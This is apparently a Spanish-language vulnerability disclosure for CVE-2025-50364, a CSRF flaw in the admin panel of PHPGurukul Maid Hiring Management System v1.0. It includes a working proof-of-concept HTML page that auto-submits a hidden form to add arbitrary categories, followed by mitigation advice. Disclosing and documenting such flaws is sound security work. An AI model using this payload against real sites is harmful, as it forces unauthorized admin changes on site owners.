
Prueba de concepto de explotación CSRF dirigida a CVE-2025-50364 en PHPGurukul Maid Hiring Management System v1.0 que añade categorías de administrador arbitrarias mediante un formulario HTML manipulado.
Nombre del proyecto y URL del repositorio: Maid Hiring Management System using PHP and MySQL
Tipo de Vulnerabilidad: Falsificación de Solicitud del Lado del Cliente
Versión(es) Afectada(s): v1.0
💣Descripción de la Vulnerabilidad: Existe una vulnerabilidad de Falsificación de Solicitud entre Sitios (CSRF) en el panel de administración del Sistema de Gestión de Contratación de PHPGurukul, que permite a un atacante agregar categorías de contratación arbitrarias engañando a un administrador autenticado para que visite un sitio malicioso. Esto puede provocar contaminación de datos y cambios no autorizados a nivel de administrador.
👩💻Impacto: Creación no autorizada de categorías
🛜Prueba de Concepto (PoC)

/admin/add-category.php
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Recomendación: Implementar tokens CSRF en los formularios de administración, aplicar cookies SameSite y validar el origen de la solicitud para evitar acciones no autorizadas.